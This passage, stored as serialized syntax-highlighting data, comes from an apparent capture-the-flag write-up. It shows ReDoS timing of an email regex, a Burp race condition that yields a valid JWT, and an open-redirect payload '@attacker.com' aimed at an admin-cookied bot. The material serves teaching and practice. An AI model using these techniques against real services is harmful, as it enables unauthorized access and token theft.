",{"type":32,"tag":78,"props":1235,"children":1236},{"style":471},[1237],{"type":37,"value":624},{"type":32,"tag":78,"props":1239,"children":1240},{"style":498},[1241],{"type":37,"value":549},{"type":32,"tag":78,"props":1243,"children":1244},{"style":504},[1245],{"type":37,"value":1246},"users",{"type":32,"tag":78,"props":1248,"children":1249},{"style":498},[1250],{"type":37,"value":1251},"\"\n",{"type":32,"tag":78,"props":1253,"children":1254},{"class":80,"line":99},[1255,1261,1266,1271,1275,1280,1284,1289,1293,1298],{"type":32,"tag":78,"props":1256,"children":1258},{"style":1257},"--shiki-default:#B8A965",[1259],{"type":37,"value":1260},"    id",{"type":32,"tag":78,"props":1262,"children":1263},{"style":471},[1264],{"type":37,"value":1265}," =",{"type":32,"tag":78,"props":1267,"children":1268},{"style":607},[1269],{"type":37,"value":1270}," Column",{"type":32,"tag":78,"props":1272,"children":1273},{"style":471},[1274],{"type":37,"value":495},{"type":32,"tag":78,"props":1276,"children":1277},{"style":607},[1278],{"type":37,"value":1279},"Integer",{"type":32,"tag":78,"props":1281,"children":1282},{"style":471},[1283],{"type":37,"value":516},{"type":32,"tag":78,"props":1285,"children":1286},{"style":519},[1287],{"type":37,"value":1288}," primary_key",{"type":32,"tag":78,"props":1290,"children":1291},{"style":471},[1292],{"type":37,"value":624},{"type":32,"tag":78,"props":1294,"children":1295},{"style":833},[1296],{"type":37,"value":1297},"True",{"type":32,"tag":78,"props":1299,"children":1300},{"style":471},[1301],{"type":37,"value":722},{"type":32,"tag":78,"props":1303,"children":1304},{"class":80,"line":108},[1305,1309,1313,1317,1321,1326],{"type":32,"tag":78,"props":1306,"children":1307},{"style":607},[1308],{"type":37,"value":974},{"type":32,"tag":78,"props":1310,"children":1311},{"style":471},[1312],{"type":37,"value":624},{"type":32,"tag":78,"props":1314,"children":1315},{"style":607},[1316],{"type":37,"value":1270},{"type":32,"tag":78,"props":1318,"children":1319},{"style":471},[1320],{"type":37,"value":495},{"type":32,"tag":78,"props":1322,"children":1323},{"style":607},[1324],{"type":37,"value":1325},"String",{"type":32,"tag":78,"props":1327,"children":1328},{"style":471},[1329],{"type":37,"value":722},{"type":32,"tag":78,"props":1331,"children":1332},{"class":80,"line":117},[1333,1338,1342,1346,1350,1355,1359,1364,1368,1372],{"type":32,"tag":78,"props":1334,"children":1335},{"style":607},[1336],{"type":37,"value":1337},"    verified ",{"type":32,"tag":78,"props":1339,"children":1340},{"style":471},[1341],{"type":37,"value":624},{"type":32,"tag":78,"props":1343,"children":1344},{"style":607},[1345],{"type":37,"value":1270},{"type":32,"tag":78,"props":1347,"children":1348},{"style":471},[1349],{"type":37,"value":495},{"type":32,"tag":78,"props":1351,"children":1352},{"style":607},[1353],{"type":37,"value":1354},"Boolean",{"type":32,"tag":78,"props":1356,"children":1357},{"style":471},[1358],{"type":37,"value":516},{"type":32,"tag":78,"props":1360,"children":1361},{"style":519},[1362],{"type":37,"value":1363}," default",{"type":32,"tag":78,"props":1365,"children":1366},{"style":471},[1367],{"type":37,"value":624},{"type":32,"tag":78,"props":1369,"children":1370},{"style":833},[1371],{"type":37,"value":1297},{"type":32,"tag":78,"props":1373,"children":1374},{"style":471},[1375],{"type":37,"value":722},{"type":32,"tag":78,"props":1377,"children":1378},{"class":80,"line":126},[1379,1384,1388,1392,1396,1400],{"type":32,"tag":78,"props":1380,"children":1381},{"style":607},[1382],{"type":37,"value":1383},"    username ",{"type":32,"tag":78,"props":1385,"children":1386},{"style":471},[1387],{"type":37,"value":624},{"type":32,"tag":78,"props":1389,"children":1390},{"style":607},[1391],{"type":37,"value":1270},{"type":32,"tag":78,"props":1393,"children":1394},{"style":471},[1395],{"type":37,"value":495},{"type":32,"tag":78,"props":1397,"children":1398},{"style":607},[1399],{"type":37,"value":1325},{"type":32,"tag":78,"props":1401,"children":1402},{"style":471},[1403],{"type":37,"value":722},{"type":32,"tag":78,"props":1405,"children":1406},{"class":80,"line":135},[1407,1412,1416,1420,1424,1428],{"type":32,"tag":78,"props":1408,"children":1409},{"style":607},[1410],{"type":37,"value":1411},"    password ",{"type":32,"tag":78,"props":1413,"children":1414},{"style":471},[1415],{"type":37,"value":624},{"type":32,"tag":78,"props":1417,"children":1418},{"style":607},[1419],{"type":37,"value":1270},{"type":32,"tag":78,"props":1421,"children":1422},{"style":471},[1423],{"type":37,"value":495},{"type":32,"tag":78,"props":1425,"children":1426},{"style":607},[1427],{"type":37,"value":1325},{"type":32,"tag":78,"props":1429,"children":1430},{"style":471},[1431],{"type":37,"value":722},{"type":32,"tag":78,"props":1433,"children":1434},{"class":80,"line":144},[1435,1440,1444,1448,1452,1456],{"type":32,"tag":78,"props":1436,"children":1437},{"style":607},[1438],{"type":37,"value":1439},"    email ",{"type":32,"tag":78,"props":1441,"children":1442},{"style":471},[1443],{"type":37,"value":624},{"type":32,"tag":78,"props":1445,"children":1446},{"style":607},[1447],{"type":37,"value":1270},{"type":32,"tag":78,"props":1449,"children":1450},{"style":471},[1451],{"type":37,"value":495},{"type":32,"tag":78,"props":1453,"children":1454},{"style":607},[1455],{"type":37,"value":1325},{"type":32,"tag":78,"props":1457,"children":1458},{"style":471},[1459],{"type":37,"value":722},{"type":32,"tag":46,"props":1461,"children":1462},{},[1463],{"type":37,"value":1464},"We know that: the account is created, and then the boolean is set to False. After this, we can therefore ask ourselves whether a race condition is possible in order to connect at the moment when the boolean is True, which allows us to retrieve a valid token.",{"type":32,"tag":46,"props":1466,"children":1467},{},[1468,1470,1476],{"type":37,"value":1469},"If we look at the EmailClient class that is used to call the send email function ",{"type":32,"tag":74,"props":1471,"children":1473},{"className":1472},[],[1474],{"type":37,"value":1475},"email_client.send_email",{"type":37,"value":485},{"type":32,"tag":63,"props":1478,"children":1479},{"lang":456},[1480],{"type":32,"tag":68,"props":1481,"children":1483},{"className":460,"code":1482,"language":456,"meta":7,"style":7},"email_client = EmailClient(email)\n",[1484],{"type":32,"tag":74,"props":1485,"children":1486},{"__ignoreMap":7},[1487],{"type":32,"tag":78,"props":1488,"children":1489},{"class":80,"line":81},[1490,1495,1499,1503,1507,1511],{"type":32,"tag":78,"props":1491,"children":1492},{"style":607},[1493],{"type":37,"value":1494},"email_client ",{"type":32,"tag":78,"props":1496,"children":1497},{"style":471},[1498],{"type":37,"value":624},{"type":32,"tag":78,"props":1500,"children":1501},{"style":607},[1502],{"type":37,"value":708},{"type":32,"tag":78,"props":1504,"children":1505},{"style":471},[1506],{"type":37,"value":495},{"type":32,"tag":78,"props":1508,"children":1509},{"style":607},[1510],{"type":37,"value":717},{"type":32,"tag":78,"props":1512,"children":1513},{"style":471},[1514],{"type":37,"value":722},{"type":32,"tag":46,"props":1516,"children":1517},{},[1518],{"type":37,"value":1519},"We can see that a regex is executed inside the constructor of the class.",{"type":32,"tag":63,"props":1521,"children":1522},{"lang":456},[1523],{"type":32,"tag":68,"props":1524,"children":1526},{"className":460,"code":1525,"language":456,"meta":7,"style":7},"class EmailClient:\n    def __init__(self, to_email):\n        email_verified = self.parse_email(to_email)\n[...]\n    def parse_email(self, email):\n        pattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\n\n        try:\n            match = re.match(pattern, email)\n[...]\n",[1527],{"type":32,"tag":74,"props":1528,"children":1529},{"__ignoreMap":7},[1530,1546,1580,1619,1635,1667,1831,1838,1850,1897],{"type":32,"tag":78,"props":1531,"children":1532},{"class":80,"line":81},[1533,1537,1541],{"type":32,"tag":78,"props":1534,"children":1535},{"style":569},[1536],{"type":37,"value":1206},{"type":32,"tag":78,"props":1538,"children":1539},{"style":1209},[1540],{"type":37,"value":708},{"type":32,"tag":78,"props":1542,"children":1543},{"style":471},[1544],{"type":37,"value":1545},":\n",{"type":32,"tag":78,"props":1547,"children":1548},{"class":80,"line":90},[1549,1554,1559,1563,1567,1571,1576],{"type":32,"tag":78,"props":1550,"children":1551},{"style":569},[1552],{"type":37,"value":1553},"    def",{"type":32,"tag":78,"props":1555,"children":1556},{"style":1257},[1557],{"type":37,"value":1558}," __init__",{"type":32,"tag":78,"props":1560,"children":1561},{"style":471},[1562],{"type":37,"value":495},{"type":32,"tag":78,"props":1564,"children":1565},{"style":607},[1566],{"type":37,"value":952},{"type":32,"tag":78,"props":1568,"children":1569},{"style":471},[1570],{"type":37,"value":516},{"type":32,"tag":78,"props":1572,"children":1573},{"style":607},[1574],{"type":37,"value":1575}," to_email",{"type":32,"tag":78,"props":1577,"children":1578},{"style":471},[1579],{"type":37,"value":966},{"type":32,"tag":78,"props":1581,"children":1582},{"class":80,"line":99},[1583,1588,1592,1597,1601,1606,1610,1615],{"type":32,"tag":78,"props":1584,"children":1585},{"style":607},[1586],{"type":37,"value":1587},"        email_verified ",{"type":32,"tag":78,"props":1589,"children":1590},{"style":471},[1591],{"type":37,"value":624},{"type":32,"tag":78,"props":1593,"children":1594},{"style":593},[1595],{"type":37,"value":1596}," self",{"type":32,"tag":78,"props":1598,"children":1599},{"style":471},[1600],{"type":37,"value":485},{"type":32,"tag":78,"props":1602,"children":1603},{"style":607},[1604],{"type":37,"value":1605},"parse_email",{"type":32,"tag":78,"props":1607,"children":1608},{"style":471},[1609],{"type":37,"value":495},{"type":32,"tag":78,"props":1611,"children":1612},{"style":607},[1613],{"type":37,"value":1614},"to_email",{"type":32,"tag":78,"props":1616,"children":1617},{"style":471},[1618],{"type":37,"value":722},{"type":32,"tag":78,"props":1620,"children":1621},{"class":80,"line":108},[1622,1627,1631],{"type":32,"tag":78,"props":1623,"children":1624},{"style":471},[1625],{"type":37,"value":1626},"[",{"type":32,"tag":78,"props":1628,"children":1629},{"style":593},[1630],{"type":37,"value":596},{"type":32,"tag":78,"props":1632,"children":1633},{"style":471},[1634],{"type":37,"value":601},{"type":32,"tag":78,"props":1636,"children":1637},{"class":80,"line":117},[1638,1642,1647,1651,1655,1659,1663],{"type":32,"tag":78,"props":1639,"children":1640},{"style":569},[1641],{"type":37,"value":1553},{"type":32,"tag":78,"props":1643,"children":1644},{"style":477},[1645],{"type":37,"value":1646}," parse_email",{"type":32,"tag":78,"props":1648,"children":1649},{"style":471},[1650],{"type":37,"value":495},{"type":32,"tag":78,"props":1652,"children":1653},{"style":607},[1654],{"type":37,"value":952},{"type":32,"tag":78,"props":1656,"children":1657},{"style":471},[1658],{"type":37,"value":516},{"type":32,"tag":78,"props":1660,"children":1661},{"style":607},[1662],{"type":37,"value":665},{"type":32,"tag":78,"props":1664,"children":1665},{"style":471},[1666],{"type":37,"value":966},{"type":32,"tag":78,"props":1668,"children":1669},{"class":80,"line":126},[1670,1675,1679,1684,1688,1693,1697,1702,1706,1711,1716,1721,1726,1730,1734,1738,1743,1748,1752,1756,1761,1765,1770,1774,1778,1782,1786,1790,1794,1800,1804,1808,1813,1818,1822,1827],{"type":32,"tag":78,"props":1671,"children":1672},{"style":607},[1673],{"type":37,"value":1674},"        pattern ",{"type":32,"tag":78,"props":1676,"children":1677},{"style":471},[1678],{"type":37,"value":624},{"type":32,"tag":78,"props":1680,"children":1681},{"style":569},[1682],{"type":37,"value":1683}," r",{"type":32,"tag":78,"props":1685,"children":1686},{"style":498},[1687],{"type":37,"value":501},{"type":32,"tag":78,"props":1689,"children":1690},{"style":1257},[1691],{"type":37,"value":1692},"^",{"type":32,"tag":78,"props":1694,"children":1695},{"style":471},[1696],{"type":37,"value":495},{"type":32,"tag":78,"props":1698,"children":1699},{"style":593},[1700],{"type":37,"value":1701},"[0-9a-zA-Z]",{"type":32,"tag":78,"props":1703,"children":1704},{"style":471},[1705],{"type":37,"value":495},{"type":32,"tag":78,"props":1707,"children":1708},{"style":593},[1709],{"type":37,"value":1710},"[-.",{"type":32,"tag":78,"props":1712,"children":1713},{"style":1257},[1714],{"type":37,"value":1715},"\\w",{"type":32,"tag":78,"props":1717,"children":1718},{"style":593},[1719],{"type":37,"value":1720},"]",{"type":32,"tag":78,"props":1722,"children":1723},{"style":918},[1724],{"type":37,"value":1725},"*",{"type":32,"tag":78,"props":1727,"children":1728},{"style":593},[1729],{"type":37,"value":1701},{"type":32,"tag":78,"props":1731,"children":1732},{"style":471},[1733],{"type":37,"value":670},{"type":32,"tag":78,"props":1735,"children":1736},{"style":918},[1737],{"type":37,"value":1725},{"type":32,"tag":78,"props":1739,"children":1741},{"style":1740},"--shiki-default:#C4704F",[1742],{"type":37,"value":474},{"type":32,"tag":78,"props":1744,"children":1745},{"style":471},[1746],{"type":37,"value":1747},"((",{"type":32,"tag":78,"props":1749,"children":1750},{"style":593},[1751],{"type":37,"value":1701},{"type":32,"tag":78,"props":1753,"children":1754},{"style":471},[1755],{"type":37,"value":670},{"type":32,"tag":78,"props":1757,"children":1758},{"style":918},[1759],{"type":37,"value":1760},"+",{"type":32,"tag":78,"props":1762,"children":1763},{"style":471},[1764],{"type":37,"value":495},{"type":32,"tag":78,"props":1766,"children":1767},{"style":593},[1768],{"type":37,"value":1769},"[-",{"type":32,"tag":78,"props":1771,"children":1772},{"style":1257},[1773],{"type":37,"value":1715},{"type":32,"tag":78,"props":1775,"children":1776},{"style":593},[1777],{"type":37,"value":1720},{"type":32,"tag":78,"props":1779,"children":1780},{"style":918},[1781],{"type":37,"value":1725},{"type":32,"tag":78,"props":1783,"children":1784},{"style":593},[1785],{"type":37,"value":1701},{"type":32,"tag":78,"props":1787,"children":1788},{"style":471},[1789],{"type":37,"value":670},{"type":32,"tag":78,"props":1791,"children":1792},{"style":918},[1793],{"type":37,"value":1725},{"type":32,"tag":78,"props":1795,"children":1797},{"style":1796},"--shiki-default:#E6CC77",[1798],{"type":37,"value":1799},"\\.",{"type":32,"tag":78,"props":1801,"children":1802},{"style":471},[1803],{"type":37,"value":670},{"type":32,"tag":78,"props":1805,"children":1806},{"style":918},[1807],{"type":37,"value":1760},{"type":32,"tag":78,"props":1809,"children":1810},{"style":593},[1811],{"type":37,"value":1812},"[a-zA-Z]",{"type":32,"tag":78,"props":1814,"children":1815},{"style":918},[1816],{"type":37,"value":1817},"{2,9}",{"type":32,"tag":78,"props":1819,"children":1820},{"style":471},[1821],{"type":37,"value":670},{"type":32,"tag":78,"props":1823,"children":1824},{"style":1257},[1825],{"type":37,"value":1826},"$",{"type":32,"tag":78,"props":1828,"children":1829},{"style":498},[1830],{"type":37,"value":1251},{"type":32,"tag":78,"props":1832,"children":1833},{"class":80,"line":135},[1834],{"type":32,"tag":78,"props":1835,"children":1836},{"emptyLinePlaceholder":157},[1837],{"type":37,"value":160},{"type":32,"tag":78,"props":1839,"children":1840},{"class":80,"line":144},[1841,1846],{"type":32,"tag":78,"props":1842,"children":1843},{"style":833},[1844],{"type":37,"value":1845},"        try",{"type":32,"tag":78,"props":1847,"children":1848},{"style":471},[1849],{"type":37,"value":1545},{"type":32,"tag":78,"props":1851,"children":1852},{"class":80,"line":153},[1853,1858,1862,1867,1871,1876,1880,1885,1889,1893],{"type":32,"tag":78,"props":1854,"children":1855},{"style":607},[1856],{"type":37,"value":1857},"            match ",{"type":32,"tag":78,"props":1859,"children":1860},{"style":471},[1861],{"type":37,"value":624},{"type":32,"tag":78,"props":1863,"children":1864},{"style":607},[1865],{"type":37,"value":1866}," re",{"type":32,"tag":78,"props":1868,"children":1869},{"style":471},[1870],{"type":37,"value":485},{"type":32,"tag":78,"props":1872,"children":1873},{"style":607},[1874],{"type":37,"value":1875},"match",{"type":32,"tag":78,"props":1877,"children":1878},{"style":471},[1879],{"type":37,"value":495},{"type":32,"tag":78,"props":1881,"children":1882},{"style":607},[1883],{"type":37,"value":1884},"pattern",{"type":32,"tag":78,"props":1886,"children":1887},{"style":471},[1888],{"type":37,"value":516},{"type":32,"tag":78,"props":1890,"children":1891},{"style":607},[1892],{"type":37,"value":665},{"type":32,"tag":78,"props":1894,"children":1895},{"style":471},[1896],{"type":37,"value":722},{"type":32,"tag":78,"props":1898,"children":1899},{"class":80,"line":163},[1900,1904,1908],{"type":32,"tag":78,"props":1901,"children":1902},{"style":471},[1903],{"type":37,"value":1626},{"type":32,"tag":78,"props":1905,"children":1906},{"style":593},[1907],{"type":37,"value":596},{"type":32,"tag":78,"props":1909,"children":1910},{"style":471},[1911],{"type":37,"value":601},{"type":32,"tag":46,"props":1913,"children":1914},{},[1915],{"type":37,"value":1916},"We can therefore try to see if sending a large email would cause the server to hang.",{"type":32,"tag":46,"props":1918,"children":1919},{},[1920],{"type":37,"value":1921},"With a small test script and a 25-character email, we can see that the function takes more than 2 seconds to execute.",{"type":32,"tag":63,"props":1923,"children":1924},{"lang":456},[1925],{"type":32,"tag":68,"props":1926,"children":1928},{"className":460,"code":1927,"language":456,"meta":7,"style":7},"# test.py\nimport datetime\nimport re\n\npattern = r\"^([0-9a-zA-Z]([-.\\w]*[0-9a-zA-Z])*@(([0-9a-zA-Z])+([-\\w]*[0-9a-zA-Z])*\\.)+[a-zA-Z]{2,9})$\"\ntime_now = datetime.datetime.now()\nemail = \"a\"*25\nre.match(pattern, email)\ntime_after = datetime.datetime.now()\nprint(time_after - time_now)\n",[1929],{"type":32,"tag":74,"props":1930,"children":1931},{"__ignoreMap":7},[1932,1940,1953,1965,1972,2120,2159,2192,2228,2264],{"type":32,"tag":78,"props":1933,"children":1934},{"class":80,"line":81},[1935],{"type":32,"tag":78,"props":1936,"children":1937},{"style":673},[1938],{"type":37,"value":1939},"# test.py\n",{"type":32,"tag":78,"props":1941,"children":1942},{"class":80,"line":90},[1943,1948],{"type":32,"tag":78,"props":1944,"children":1945},{"style":833},[1946],{"type":37,"value":1947},"import",{"type":32,"tag":78,"props":1949,"children":1950},{"style":607},[1951],{"type":37,"value":1952}," datetime\n",{"type":32,"tag":78,"props":1954,"children":1955},{"class":80,"line":99},[1956,1960],{"type":32,"tag":78,"props":1957,"children":1958},{"style":833},[1959],{"type":37,"value":1947},{"type":32,"tag":78,"props":1961,"children":1962},{"style":607},[1963],{"type":37,"value":1964}," re\n",{"type":32,"tag":78,"props":1966,"children":1967},{"class":80,"line":108},[1968],{"type":32,"tag":78,"props":1969,"children":1970},{"emptyLinePlaceholder":157},[1971],{"type":37,"value":160},{"type":32,"tag":78,"props":1973,"children":1974},{"class":80,"line":117},[1975,1980,1984,1988,1992,1996,2000,2004,2008,2012,2016,2020,2024,2028,2032,2036,2040,2044,2048,2052,2056,2060,2064,2068,2072,2076,2080,2084,2088,2092,2096,2100,2104,2108,2112,2116],{"type":32,"tag":78,"props":1976,"children":1977},{"style":607},[1978],{"type":37,"value":1979},"pattern ",{"type":32,"tag":78,"props":1981,"children":1982},{"style":471},[1983],{"type":37,"value":624},{"type":32,"tag":78,"props":1985,"children":1986},{"style":569},[1987],{"type":37,"value":1683},{"type":32,"tag":78,"props":1989,"children":1990},{"style":498},[1991],{"type":37,"value":501},{"type":32,"tag":78,"props":1993,"children":1994},{"style":1257},[1995],{"type":37,"value":1692},{"type":32,"tag":78,"props":1997,"children":1998},{"style":471},[1999],{"type":37,"value":495},{"type":32,"tag":78,"props":2001,"children":2002},{"style":593},[2003],{"type":37,"value":1701},{"type":32,"tag":78,"props":2005,"children":2006},{"style":471},[2007],{"type":37,"value":495},{"type":32,"tag":78,"props":2009,"children":2010},{"style":593},[2011],{"type":37,"value":1710},{"type":32,"tag":78,"props":2013,"children":2014},{"style":1257},[2015],{"type":37,"value":1715},{"type":32,"tag":78,"props":2017,"children":2018},{"style":593},[2019],{"type":37,"value":1720},{"type":32,"tag":78,"props":2021,"children":2022},{"style":918},[2023],{"type":37,"value":1725},{"type":32,"tag":78,"props":2025,"children":2026},{"style":593},[2027],{"type":37,"value":1701},{"type":32,"tag":78,"props":2029,"children":2030},{"style":471},[2031],{"type":37,"value":670},{"type":32,"tag":78,"props":2033,"children":2034},{"style":918},[2035],{"type":37,"value":1725},{"type":32,"tag":78,"props":2037,"children":2038},{"style":1740},[2039],{"type":37,"value":474},{"type":32,"tag":78,"props":2041,"children":2042},{"style":471},[2043],{"type":37,"value":1747},{"type":32,"tag":78,"props":2045,"children":2046},{"style":593},[2047],{"type":37,"value":1701},{"type":32,"tag":78,"props":2049,"children":2050},{"style":471},[2051],{"type":37,"value":670},{"type":32,"tag":78,"props":2053,"children":2054},{"style":918},[2055],{"type":37,"value":1760},{"type":32,"tag":78,"props":2057,"children":2058},{"style":471},[2059],{"type":37,"value":495},{"type":32,"tag":78,"props":2061,"children":2062},{"style":593},[2063],{"type":37,"value":1769},{"type":32,"tag":78,"props":2065,"children":2066},{"style":1257},[2067],{"type":37,"value":1715},{"type":32,"tag":78,"props":2069,"children":2070},{"style":593},[2071],{"type":37,"value":1720},{"type":32,"tag":78,"props":2073,"children":2074},{"style":918},[2075],{"type":37,"value":1725},{"type":32,"tag":78,"props":2077,"children":2078},{"style":593},[2079],{"type":37,"value":1701},{"type":32,"tag":78,"props":2081,"children":2082},{"style":471},[2083],{"type":37,"value":670},{"type":32,"tag":78,"props":2085,"children":2086},{"style":918},[2087],{"type":37,"value":1725},{"type":32,"tag":78,"props":2089,"children":2090},{"style":1796},[2091],{"type":37,"value":1799},{"type":32,"tag":78,"props":2093,"children":2094},{"style":471},[2095],{"type":37,"value":670},{"type":32,"tag":78,"props":2097,"children":2098},{"style":918},[2099],{"type":37,"value":1760},{"type":32,"tag":78,"props":2101,"children":2102},{"style":593},[2103],{"type":37,"value":1812},{"type":32,"tag":78,"props":2105,"children":2106},{"style":918},[2107],{"type":37,"value":1817},{"type":32,"tag":78,"props":2109,"children":2110},{"style":471},[2111],{"type":37,"value":670},{"type":32,"tag":78,"props":2113,"children":2114},{"style":1257},[2115],{"type":37,"value":1826},{"type":32,"tag":78,"props":2117,"children":2118},{"style":498},[2119],{"type":37,"value":1251},{"type":32,"tag":78,"props":2121,"children":2122},{"class":80,"line":126},[2123,2128,2132,2137,2141,2146,2150,2155],{"type":32,"tag":78,"props":2124,"children":2125},{"style":607},[2126],{"type":37,"value":2127},"time_now ",{"type":32,"tag":78,"props":2129,"children":2130},{"style":471},[2131],{"type":37,"value":624},{"type":32,"tag":78,"props":2133,"children":2134},{"style":607},[2135],{"type":37,"value":2136}," datetime",{"type":32,"tag":78,"props":2138,"children":2139},{"style":471},[2140],{"type":37,"value":485},{"type":32,"tag":78,"props":2142,"children":2143},{"style":607},[2144],{"type":37,"value":2145},"datetime",{"type":32,"tag":78,"props":2147,"children":2148},{"style":471},[2149],{"type":37,"value":485},{"type":32,"tag":78,"props":2151,"children":2152},{"style":607},[2153],{"type":37,"value":2154},"now",{"type":32,"tag":78,"props":2156,"children":2157},{"style":471},[2158],{"type":37,"value":1170},{"type":32,"tag":78,"props":2160,"children":2161},{"class":80,"line":135},[2162,2167,2171,2175,2179,2183,2187],{"type":32,"tag":78,"props":2163,"children":2164},{"style":607},[2165],{"type":37,"value":2166},"email ",{"type":32,"tag":78,"props":2168,"children":2169},{"style":471},[2170],{"type":37,"value":624},{"type":32,"tag":78,"props":2172,"children":2173},{"style":498},[2174],{"type":37,"value":549},{"type":32,"tag":78,"props":2176,"children":2177},{"style":504},[2178],{"type":37,"value":408},{"type":32,"tag":78,"props":2180,"children":2181},{"style":498},[2182],{"type":37,"value":501},{"type":32,"tag":78,"props":2184,"children":2185},{"style":569},[2186],{"type":37,"value":1725},{"type":32,"tag":78,"props":2188,"children":2189},{"style":918},[2190],{"type":37,"value":2191},"25\n",{"type":32,"tag":78,"props":2193,"children":2194},{"class":80,"line":144},[2195,2200,2204,2208,2212,2216,2220,2224],{"type":32,"tag":78,"props":2196,"children":2197},{"style":607},[2198],{"type":37,"value":2199},"re",{"type":32,"tag":78,"props":2201,"children":2202},{"style":471},[2203],{"type":37,"value":485},{"type":32,"tag":78,"props":2205,"children":2206},{"style":607},[2207],{"type":37,"value":1875},{"type":32,"tag":78,"props":2209,"children":2210},{"style":471},[2211],{"type":37,"value":495},{"type":32,"tag":78,"props":2213,"children":2214},{"style":607},[2215],{"type":37,"value":1884},{"type":32,"tag":78,"props":2217,"children":2218},{"style":471},[2219],{"type":37,"value":516},{"type":32,"tag":78,"props":2221,"children":2222},{"style":607},[2223],{"type":37,"value":665},{"type":32,"tag":78,"props":2225,"children":2226},{"style":471},[2227],{"type":37,"value":722},{"type":32,"tag":78,"props":2229,"children":2230},{"class":80,"line":153},[2231,2236,2240,2244,2248,2252,2256,2260],{"type":32,"tag":78,"props":2232,"children":2233},{"style":607},[2234],{"type":37,"value":2235},"time_after ",{"type":32,"tag":78,"props":2237,"children":2238},{"style":471},[2239],{"type":37,"value":624},{"type":32,"tag":78,"props":2241,"children":2242},{"style":607},[2243],{"type":37,"value":2136},{"type":32,"tag":78,"props":2245,"children":2246},{"style":471},[2247],{"type":37,"value":485},{"type":32,"tag":78,"props":2249,"children":2250},{"style":607},[2251],{"type":37,"value":2145},{"type":32,"tag":78,"props":2253,"children":2254},{"style":471},[2255],{"type":37,"value":485},{"type":32,"tag":78,"props":2257,"children":2258},{"style":607},[2259],{"type":37,"value":2154},{"type":32,"tag":78,"props":2261,"children":2262},{"style":471},[2263],{"type":37,"value":1170},{"type":32,"tag":78,"props":2265,"children":2266},{"class":80,"line":163},[2267,2272,2276,2280,2285,2290],{"type":32,"tag":78,"props":2268,"children":2269},{"style":1257},[2270],{"type":37,"value":2271},"print",{"type":32,"tag":78,"props":2273,"children":2274},{"style":471},[2275],{"type":37,"value":495},{"type":32,"tag":78,"props":2277,"children":2278},{"style":607},[2279],{"type":37,"value":2235},{"type":32,"tag":78,"props":2281,"children":2282},{"style":569},[2283],{"type":37,"value":2284},"-",{"type":32,"tag":78,"props":2286,"children":2287},{"style":607},[2288],{"type":37,"value":2289}," time_now",{"type":32,"tag":78,"props":2291,"children":2292},{"style":471},[2293],{"type":37,"value":722},{"type":32,"tag":46,"props":2295,"children":2296},{},[2297],{"type":37,"value":2298},"You can find below the result of the execution of the script:",{"type":32,"tag":52,"props":2300,"children":2303},{"imgSrc":2301,":width":2302},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704226431/writeups/phantom-feed/test_regex.webp","350",[],{"type":32,"tag":46,"props":2305,"children":2306},{},[2307],{"type":37,"value":2308},"So, we can confirm that if we register a user with an email that is 25 characters long and then try to log in, we will have a valid token. This is because the boolean will be set to True at the time of login.",{"type":32,"tag":46,"props":2310,"children":2311},{},[2312],{"type":37,"value":2313},"With Burp, we can easily exploit a race condition like this. Just select the \"Send group (separate connections)\" option to exploit the vulnerability.",{"type":32,"tag":52,"props":2315,"children":2317},{"imgSrc":2316},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704325504/writeups/phantom-feed/burp_race_condition.webp",[],{"type":32,"tag":46,"props":2319,"children":2320},{},[2321],{"type":37,"value":2322},"After that, we can see that during the connection, a JWT token was sent to us by the application. This token allows us to access routes protected by a middleware, which we will see in the next section.",{"type":32,"tag":52,"props":2324,"children":2326},{"imgSrc":2325},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704311577/writeups/phantom-feed/burp_login_token.webp",[],{"type":32,"tag":39,"props":2328,"children":2330},{"id":2329},"open-redirect",[2331],{"type":37,"value":2332},"Open Redirect",{"type":32,"tag":46,"props":2334,"children":2335},{},[2336],{"type":37,"value":2337},"So now we have a valid user token, we can call the route to invoke the bot.",{"type":32,"tag":46,"props":2339,"children":2340},{},[2341,2343,2349,2351,2357],{"type":37,"value":2342},"When examining the bot's declaration, it becomes apparent that the \"link\" parameter, which we have control over, is being used in an insecure manner and is susceptible to open redirection.\nIf we submit a payload like ",{"type":32,"tag":74,"props":2344,"children":2346},{"className":2345},[],[2347],{"type":37,"value":2348},"@attacker.com",{"type":37,"value":2350}," the bot will be redirected to ",{"type":32,"tag":74,"props":2352,"children":2354},{"className":2353},[],[2355],{"type":37,"value":2356},"attacker.com",{"type":37,"value":485},{"type":32,"tag":63,"props":2359,"children":2360},{"lang":456},[2361],{"type":32,"tag":68,"props":2362,"children":2364},{"className":460,"code":2363,"language":456,"meta":7,"style":7},"def bot_runner(link):\n    chrome_options = Options()\n [...]\n    client = webdriver.Chrome(options=chrome_options)\n    client.get(\"http://127.0.0.1:5000\")\n\n    token = create_jwt(1, \"administrator\")\n    cookie = {\n        \"name\": \"token\",\n        \"value\": token,\n        \"domain\": \"127.0.0.1\",\n        \"path\": \"/\",\n        \"expiry\": int((datetime.datetime.now() + datetime.timedelta(seconds=1800)).timestamp()),\n        \"secure\": False,\n        \"httpOnly\": True\n    }\n    client.add_cookie(cookie)\n\n    client.get(\"http://127.0.0.1:5000\" + link) # \u003C--- Here is the open redirect\n    time.sleep(10)\n    client.quit()\n",[2365],{"type":32,"tag":74,"props":2366,"children":2367},{"__ignoreMap":7},[2368,2393,2414,2430,2478,2516,2523,2570,2587,2626,2655,2692,2729,2834,2862,2887,2894,2923,2930,2979,3009],{"type":32,"tag":78,"props":2369,"children":2370},{"class":80,"line":81},[2371,2375,2380,2384,2389],{"type":32,"tag":78,"props":2372,"children":2373},{"style":569},[2374],{"type":37,"value":572},{"type":32,"tag":78,"props":2376,"children":2377},{"style":477},[2378],{"type":37,"value":2379}," bot_runner",{"type":32,"tag":78,"props":2381,"children":2382},{"style":471},[2383],{"type":37,"value":495},{"type":32,"tag":78,"props":2385,"children":2386},{"style":607},[2387],{"type":37,"value":2388},"link",{"type":32,"tag":78,"props":2390,"children":2391},{"style":471},[2392],{"type":37,"value":966},{"type":32,"tag":78,"props":2394,"children":2395},{"class":80,"line":90},[2396,2401,2405,2410],{"type":32,"tag":78,"props":2397,"children":2398},{"style":607},[2399],{"type":37,"value":2400},"    chrome_options 